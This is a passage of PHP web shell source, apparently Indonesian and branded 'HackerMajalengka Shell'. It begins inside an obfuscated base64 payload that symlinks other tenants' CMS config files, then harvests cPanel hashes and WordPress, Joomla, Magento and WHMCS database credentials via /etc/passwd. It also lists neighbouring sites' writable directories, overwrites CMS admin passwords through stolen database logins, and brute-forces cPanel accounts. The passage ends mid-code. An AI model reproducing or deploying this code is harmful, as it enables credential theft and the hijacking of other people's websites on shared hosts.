zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
  1947. $file = "mct_config/vhost.cin";
  1948. $handle = fopen($file ,"w+");
  1949. fwrite($handle ,base64_decode($vhost));
  1950. fclose($handle);
  1951. chmod($file, 0755);
  1952. if(exe("cd mct_config && ./vhost.cin")) {
  1953. echo "<center><a href='$link_config/mct_config'><font color=cyan>Done</font></a></center>";
  1954. } else {
  1955. echo "<center><a href='$link_config/mct_config/vhost.cin'><font color=cyan>Done</font></a></center>";
  1956. }
  1957.  
  1958. } else {
  1959. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  1960. while($passwd = fgets($etc)) {
  1961. if($passwd == "" || !$etc) {
  1962. echo "<font color=red>Can't read /etc/passwd</font>";
  1963. } else {
  1964. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1965. foreach($user_config[1] as $user_human) {
  1966. $user_config_dir = "/home/$user_human/public_html/";
  1967. if(is_readable($user_config_dir)) {
  1968. $grab_config = array(
  1969. "/home/$user_human/.my.cnf" => "cpanel",
  1970. "/home/$user_human/.accesshash" => "WHM-accesshash",
  1971. "$user_config_dir/po-content/config.php" => "Popoji",
  1972. "$user_config_dir/vdo_config.php" => "Voodoo",
  1973. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
  1974. "$user_config_dir/config/koneksi.php" => "Lokomedia",
  1975. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
  1976. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
  1977. "$user_config_dir/whm/configuration.php" => "WHMCS",
  1978. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
  1979. "$user_config_dir/forum/config.php" => "phpBB",
  1980. "$user_config_dir/sites/default/settings.php" => "Drupal",
  1981. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
  1982. "$user_config_dir/app/etc/local.xml" => "Magento",
  1983. "$user_config_dir/joomla/configuration.php" => "Joomla",
  1984. "$user_config_dir/configuration.php" => "Joomla",
  1985. "$user_config_dir/wp/wp-config.php" => "WordPress",
  1986. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
  1987. "$user_config_dir/wp-config.php" => "WordPress",
  1988. "$user_config_dir/admin/config.php" => "OpenCart",
  1989. "$user_config_dir/slconfig.php" => "Sitelok",
  1990. "$user_config_dir/application/config/database.php" => "Ellislab");
  1991. foreach($grab_config as $config => $nama_config) {
  1992. $ambil_config = file_get_contents($config);
  1993. if($ambil_config == '') {
  1994. } else {
  1995. $file_config = fopen("mct_config/$user_human-$nama_config.txt","w");
  1996. fputs($file_config,$ambil_config);
  1997. }
  1998. }
  1999. }
  2000. }
  2001. }
  2002. }
  2003. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2004. echo "<center><a href='?dir=$dir/mct_config'><font color=cyan>Done</font></a></center></div>";
  2005. }
  2006. } elseif($_GET['do'] == 'jumping') {
  2007. $i = 0;
  2008. echo "<div class='margin: 5px auto;'>";
  2009. if(preg_match("/hsphere/", $dir)) {
  2010. $urls = explode("\r\n", $_POST['url']);
  2011. if(isset($_POST['jump'])) {
  2012. echo "<pre>";
  2013. foreach($urls as $url) {
  2014. $url = str_replace(array("http://","www."), "", strtolower($url));
  2015. $etc = "/etc/passwd";
  2016. $f = fopen($etc,"r");
  2017. while($gets = fgets($f)) {
  2018. $pecah = explode(":", $gets);
  2019. $user = $pecah[0];
  2020. $dir_user = "/hsphere/local/home/$user";
  2021. if(is_dir($dir_user) === true) {
  2022. $url_user = $dir_user."/".$url;
  2023. if(is_readable($url_user)) {
  2024. $i++;
  2025. $jrw = "[<font color=cyan>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  2026. if(is_writable($url_user)) {
  2027. $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  2028. }
  2029. echo $jrw."<br>";
  2030. }
  2031. }
  2032. }
  2033. }
  2034. if($i == 0) {
  2035. } else {
  2036. echo "<br>Total ada ".$i." Kamar di ".$ip;
  2037. }
  2038. echo "</pre>";
  2039. } else {
  2040. echo '<center>
  2041. <form method="post">
  2042. List Domains: <br>
  2043. <textarea name="url" style="width: 500px; height: 250px;">';
  2044. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  2045. while($getss = fgets($fp)) {
  2046. echo $getss;
  2047. }
  2048. echo '</textarea><br>
  2049. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  2050. </form></center>';
  2051. }
  2052. } elseif(preg_match("/vhosts|vhost/", $dir)) {
  2053. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  2054. $urls = explode("\r\n", $_POST['url']);
  2055. if(isset($_POST['jump'])) {
  2056. echo "<pre>";
  2057. foreach($urls as $url) {
  2058. $url = str_replace("www.", "", $url);
  2059. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  2060. if(is_dir($web_vh) === true) {
  2061. if(is_readable($web_vh)) {
  2062. $i++;
  2063. $jrw = "[<font color=cyan>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  2064. if(is_writable($web_vh)) {
  2065. $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  2066. }
  2067. echo $jrw."<br>";
  2068. }
  2069. }
  2070. }
  2071. if($i == 0) {
  2072. } else {
  2073. echo "<br>Total ada ".$i." Kamar di ".$ip;
  2074. }
  2075. echo "</pre>";
  2076. } else {
  2077. echo '<center>
  2078. <form method="post">
  2079. List Domains: <br>
  2080. <textarea name="url" style="width: 500px; height: 250px;">';
  2081. bing("ip:$ip");
  2082. echo '</textarea><br>
  2083. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  2084. </form></center>';
  2085. }
  2086. } else {
  2087. echo "<pre>";
  2088. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  2089. while($passwd = fgets($etc)) {
  2090. if($passwd == '' || !$etc) {
  2091. echo "<font color=red>Can't read /etc/passwd</font>";
  2092. } else {
  2093. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  2094. foreach($user_jumping[1] as $user_human_jump) {
  2095. $user_jumping_dir = "/home/$user_human_jump/public_html";
  2096. if(is_readable($user_jumping_dir)) {
  2097. $i++;
  2098. $jrw = "[<font color=cyan>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  2099. if(is_writable($user_jumping_dir)) {
  2100. $jrw = "[<font color=cyan>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  2101. }
  2102. echo $jrw;
  2103. if(function_exists('posix_getpwuid')) {
  2104. $domain_jump = file_get_contents("/etc/named.conf");
  2105. if($domain_jump == '') {
  2106. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  2107. } else {
  2108. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2109. foreach($domains_jump[1] as $dj) {
  2110. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2111. $user_jumping_url = $user_jumping_url['name'];
  2112. if($user_jumping_url == $user_human_jump) {
  2113. echo " => ( <u>$dj</u> )<br>";
  2114. break;
  2115. }
  2116. }
  2117. }
  2118. } else {
  2119. echo "<br>";
  2120. }
  2121. }
  2122. }
  2123. }
  2124. }
  2125. if($i == 0) {
  2126. } else {
  2127. echo "<br>Total ada ".$i." Kamar di ".$ip;
  2128. }
  2129. echo "</pre>";
  2130. }
  2131. echo "</div>";
  2132. } elseif($_GET['do'] == 'auto_edit_user') {
  2133. if($_POST['hajar']) {
  2134. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2135. echo "username atau password harus lebih dari 6 karakter";
  2136. } else {
  2137. $user_baru = $_POST['user_baru'];
  2138. $pass_baru = md5($_POST['pass_baru']);
  2139. $conf = $_POST['config_dir'];
  2140. $scan_conf = scandir($conf);
  2141. foreach($scan_conf as $file_conf) {
  2142. if(!is_file("$conf/$file_conf")) continue;
  2143. $config = file_get_contents("$conf/$file_conf");
  2144. if(preg_match("/JConfig|joomla/",$config)) {
  2145. $dbhost = ambilkata($config,"host = '","'");
  2146. $dbuser = ambilkata($config,"user = '","'");
  2147. $dbpass = ambilkata($config,"password = '","'");
  2148. $dbname = ambilkata($config,"db = '","'");
  2149. $dbprefix = ambilkata($config,"dbprefix = '","'");
  2150. $prefix = $dbprefix."users";
  2151. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2152. $db = mysql_select_db($dbname);
  2153. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2154. $result = mysql_fetch_array($q);
  2155. $id = $result['id'];
  2156. $site = ambilkata($config,"sitename = '","'");
  2157. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2158. echo "Config => ".$file_conf."<br>";
  2159. echo "CMS => Joomla<br>";
  2160. if($site == '') {
  2161.  
  2162. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2163. } else {
  2164. echo "Sitename => $site<br>";
  2165. }
  2166. if(!$update OR !$conn OR !$db) {
  2167. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2168. } else {
  2169. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2170. }
  2171. mysql_close($conn);
  2172. } elseif(preg_match("/WordPress/",$config)) {
  2173. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2174. $dbuser = ambilkata($config,"DB_USER', '","'");
  2175. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2176. $dbname = ambilkata($config,"DB_NAME', '","'");
  2177. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2178. $prefix = $dbprefix."users";
  2179. $option = $dbprefix."options";
  2180. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2181. $db = mysql_select_db($dbname);
  2182. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2183. $result = mysql_fetch_array($q);
  2184. $id = $result[ID];
  2185. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2186. $result2 = mysql_fetch_array($q2);
  2187. $target = $result2[option_value];
  2188. if($target == '') {
  2189. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2190. } else {
  2191. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2192. }
  2193. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2194. echo "Config => ".$file_conf."<br>";
  2195. echo "CMS => Wordpress<br>";
  2196. echo $url_target;
  2197. if(!$update OR !$conn OR !$db) {
  2198. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2199. } else {
  2200. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2201. }
  2202. mysql_close($conn);
  2203. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  2204. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  2205. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  2206. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2207. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2208. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2209. $prefix = $dbprefix."admin_user";
  2210. $option = $dbprefix."core_config_data";
  2211. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2212. $db = mysql_select_db($dbname);
  2213. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2214. $result = mysql_fetch_array($q);
  2215. $id = $result[user_id];
  2216. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2217. $result2 = mysql_fetch_array($q2);
  2218. $target = $result2[value];
  2219. if($target == '') {
  2220. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2221. } else {
  2222. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2223. }
  2224. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2225. echo "Config => ".$file_conf."<br>";
  2226. echo "CMS => Magento<br>";
  2227. echo $url_target;
  2228. if(!$update OR !$conn OR !$db) {
  2229. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2230. } else {
  2231. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2232. }
  2233. mysql_close($conn);
  2234. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2235. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2236. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2237. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2238. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2239. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2240. $prefix = $dbprefix."user";
  2241. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2242. $db = mysql_select_db($dbname);
  2243. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2244. $result = mysql_fetch_array($q);
  2245. $id = $result[user_id];
  2246. $target = ambilkata($config,"HTTP_SERVER', '","'");
  2247. if($target == '') {
  2248. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2249. } else {
  2250. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2251. }
  2252. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2253. echo "Config => ".$file_conf."<br>";
  2254. echo "CMS => OpenCart<br>";
  2255. echo $url_target;
  2256. if(!$update OR !$conn OR !$db) {
  2257. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2258. } else {
  2259. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2260. }
  2261. mysql_close($conn);
  2262. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2263. $dbhost = ambilkata($config,'server = "','"');
  2264. $dbuser = ambilkata($config,'username = "','"');
  2265. $dbpass = ambilkata($config,'password = "','"');
  2266. $dbname = ambilkata($config,'database = "','"');
  2267. $prefix = "users";
  2268. $option = "identitas";
  2269. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2270. $db = mysql_select_db($dbname);
  2271. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2272. $result = mysql_fetch_array($q);
  2273. $target = $result[alamat_website];
  2274. if($target == '') {
  2275. $target2 = $result[url];
  2276. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2277. if($target2 == '') {
  2278. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2279. } else {
  2280. $cek_login3 = file_get_contents("$target2/adminweb/");
  2281. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2282. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2283. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2284. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2285. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2286. } else {
  2287. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2288. }
  2289. }
  2290. } else {
  2291. $cek_login = file_get_contents("$target/adminweb/");
  2292. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2293. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2294. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2295. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2296. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2297. } else {
  2298. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2299. }
  2300. }
  2301. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2302. echo "Config => ".$file_conf."<br>";
  2303. echo "CMS => Lokomedia<br>";
  2304. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2305. echo $url_target2;
  2306. } else {
  2307. echo $url_target;
  2308. }
  2309. if(!$update OR !$conn OR !$db) {
  2310. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2311. } else {
  2312. echo "Status => <font color=cyan>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2313. }
  2314. mysql_close($conn);
  2315. }
  2316. }
  2317. }
  2318. } else {
  2319. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Auto Edit User Config [+]</div>";
  2320. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2321. echo "<center>
  2322. <form method='post'>
  2323. DIR Config: <br>
  2324. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2325. Set User & Pass: <br>
  2326. <input type='text' name='user_baru' value='gandatamvan' placeholder='user_baru'><br>
  2327. <input type='text' name='pass_baru' value='gandatamvan' placeholder='pass_baru'><br>
  2328. <input type='submit' name='hajar' value='Submit' style='width: 215px;'>
  2329. </form>
  2330. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2331. ";
  2332. }
  2333.  
  2334. } elseif($_GET['do'] == 'cpanel') {
  2335. if($_POST['crack']) {
  2336. $usercp = explode("\r\n", $_POST['user_cp']);
  2337. $passcp = explode("\r\n", $_POST['pass_cp']);
  2338. $i = 0;
  2339. foreach($usercp as $ucp) {
  2340. foreach($passcp as $pcp) {
  2341. if(@mysql_connect('localhost', $ucp, $pcp)) {
  2342. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2343. } else {
  2344. $_SESSION[$ucp] = "1";
  2345. $_SESSION[$pcp] = "1";
  2346. if($ucp == '' || $pcp == '') {
  2347.  
  2348. } else {
  2349. $i++;
  2350. if(function_exists('posix_getpwuid')) {
  2351. $domain_cp = file_get_contents("/etc/named.conf");
  2352. if($domain_cp == '') {
  2353. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  2354. } else {
  2355. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2356. foreach($domains_cp[1] as $dj) {
  2357. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2358. $user_cp_url = $user_cp_url['name'];
  2359. if($user_cp_url == $ucp) {
  2360. $dom = "<a href='http://$dj/' target='_blank'><font color=cyan>$dj</font></a>";
  2361. break;
  2362. }
  2363. }
  2364. }
  2365. } else {
  2366. $dom = "<font color=red>function is Disable by system</font>";
  2367. }
  2368. echo "username (<font color=cyan>$ucp</font>) password (<font color=cyan>$pcp</font>) domain ($dom)<br>";
  2369. }
  2370. }
  2371. }
  2372. }
  2373. }
  2374. if($i == 0) {
  2375. } else {
  2376. echo "<br>sukses nyolong ".$i." Cpanel by <font color=cyan>HackerMajalengka Shell.</font>";
  2377. }
  2378. } else {
  2379. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] cPanel Crack [+]</div>";
  2380. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2381. echo "<form method='post'>
  2382. USER: <br>
  2383. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2384. $_usercp = fopen("/etc/passwd","r");
  2385. while($getu = fgets($_usercp)) {
